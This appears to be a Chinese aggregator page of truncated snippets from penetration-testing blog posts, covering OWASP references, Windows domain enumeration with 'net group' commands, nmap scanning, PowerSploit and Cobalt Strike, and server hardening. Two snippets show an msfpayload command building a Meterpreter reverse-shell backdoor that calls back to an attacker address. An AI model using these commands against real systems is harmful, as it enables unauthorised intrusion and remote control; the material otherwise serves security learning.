渗透相关website】的更多相关文章

开源安全测试方法论:http://www.isecom.org/research/osstmm.html 信息系统安全评估框架:www.oissg.org/issaf 开放式web应用程序安全项目(OWASP):https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project 测试指南:https://www.owasp.org/index/php/OWASP_Testing-Guide_v3_Table_of_Content 开发人员…
  net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admins” /domain 获得企业管理员列表 net localgroup administrators /domain 获取域内置administrators组用户,这个组内成员包含enterprise admins与domain admins,权限一样 net group “domain cont…
x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPO…
0×01 前言 因为今天的重点并非nmap本身的使用,主要还是想借这次机会给大家介绍一些在实战中相对比较实用的nmap脚本,所以关于nmap自身的一些基础选项就不多说了,详情可参考博客端口渗透相关文章,废话少说,咱们直接开始,实际中我们可以先用下面的语句,大概扫一眼目标机器或目标C段都跑了什么服务,心里总要先有个谱,之后才好针对性出牌嘛 # nmap -sV -sT -Pn --open -v 192.168.3.23 当然,你也可以用下面的脚本先尝试获取下目标机器更详细的服务banner信息[…
WEB站点服务器安全配置   本文转自:i春秋社区   // 概述 // 熟悉网站程序 // 更改默认设置的必要性 // 目录分析与权限设置技巧 // 防止攻击其他要素 // 公司官网不可忽视的安全性 // 尽可能的防止不必要的信息泄漏 一:概述 圈内基本上都已经熟悉了黑产吧,现在攻击的门槛越来越低,黑产也越来越被人熟知.在巨大的经济利益的驱使下,每天 基本上有成百上千的网站被攻击,在网站安全无法完全保障的情况下,在此编写此文仅为站长作为参考. 作为一名信息安全爱好者来说,本人无法保证此文的可用…
powershell脚本站点的搭建 一.Powersploit Powersploit是一款基于powershell的后渗透(Post-Exploitation)框架,集成大量渗透相关模块和功能. 下载powersploit github地址: https://github.com/mattifestation/PowerSploit 二.搭建站点(这里用python自带的web服务,也可以用phpstudy等搭建站点) 1.实验环境: 服务端:win7(python3.7) 客户端:Windo…
准备工作 ''' PowerView是PowerSploit框架的一个子集,里面继承了很多和渗透相关的powershell脚本下载地址:https://github.com/PowerShellMafia/PowerSploit 如果没有,请下载这个连接的版本的模块:https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 引用模块,可以单独引用PowerSploit的子模块或者引用…
0×01 前言 因为今天的重点并非nmap本身的使用,主要还是想借这次机会给大家介绍一些在实战中相对比较实用的nmap脚本,所以关于nmap自身的一些基础选项就不多说了,详情可参考博客端口渗透相关文章,废话少说,咱们直接开始,实际中我们可以先用下面的语句,大概扫一眼目标机器或目标C段都跑了什么服务,心里总要先有个谱,之后才好针对性出牌嘛 # nmap -sV -sT -Pn --open -v 192.168.3.23 当然,你也可以用下面的脚本先尝试获取下目标机器更详细的服务banner信息[…
原文:https://klionsec.github.io/2017/09/23/cobalt-strike/#menu 0x01 关于 Cobalt Strike 1 2 3 一款非常优秀的后渗透平台 [ 谁用谁知道,嘿嘿……说不好用的唯一原因,可能就是很多用法还没有被自己挖掘出来,因为不会用,所以,才会感觉不好用 ] 工具基于java,大部分功能在改进的基础上还是相对比较实用的,非常适合团队间协同作战 更多详情请自行参考官网,这里就不啰嗦了,以下全部简称'cs' 0x02 基础环境简介: 1…